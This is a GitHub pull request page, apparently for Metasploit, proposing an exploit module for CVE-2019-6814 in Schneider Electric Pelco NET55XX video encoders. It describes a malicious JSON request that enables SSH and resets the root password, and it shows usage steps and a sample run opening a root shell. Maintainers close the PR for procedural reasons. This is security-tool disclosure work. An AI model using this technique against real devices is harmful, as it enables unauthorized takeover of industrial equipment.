Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add for Schneider Electric NET55XX Encoder (CVE -2019 -6814) #12049

Closed
wants to merge 1 commit into from

Conversation

Projects
None yet
3 participants
@vitorespf
Copy link

commented Jul 3, 2019

Description

Adding Schneider Electric Pelco NET55XX module affecting Webmin NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).

This module exploits an inadequate access control vulnerability creating a malicious json request to the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.

Verification Steps

  1. start msfconsole
  2. use exploit/unix/http/schneider_electric_net55xx_encoder.rb
  3. Set rhosts [IP]
  4. Set new_password [NEW PASSWORD]
  5. exploit

Sample Run

msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
NEW_PASSWORD => msfrapid7
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run

[] 192.168.34.2:22 - Attempt to start a SSH connection...
[
] 192.168.34.2:80 - Attempt to change the root password...
[+] 192.168.34.2:80 - Successfully changed the root password...
[+] 192.168.34.2:22 - Session established
[] Found shell.
[
] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400

uname -a;id
Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
uid=0(root) gid=0(root) groups=0(root)

@vitorespf vitorespf changed the title Schneider Electric NET55XX Encoder exploit Add Schneider Electric NET55XX Encoder exploit Jul 9, 2019

@vitorespf vitorespf changed the title Add Schneider Electric NET55XX Encoder exploit Add for Schneider Electric NET55XX Encoder (CVE -2019 -6814) Jul 9, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 10, 2019

Hi @vitorespf! Sorry for the delay on this PR. I noticed that this PR was submitted off of your master branch. First, please create a new branch and submit a new PR under that branch. Once that's done, we can start a review. Thank you!

@space-r7 space-r7 closed this Jul 10, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jul 10, 2019

Another thing, especially helpful with exploits that target specific hardware, is to include module docs with your PR that include how to setup vulnerable targets, what the module looks like in action, etc. (similar to what you provided in the PR description above). See https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation for more info.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.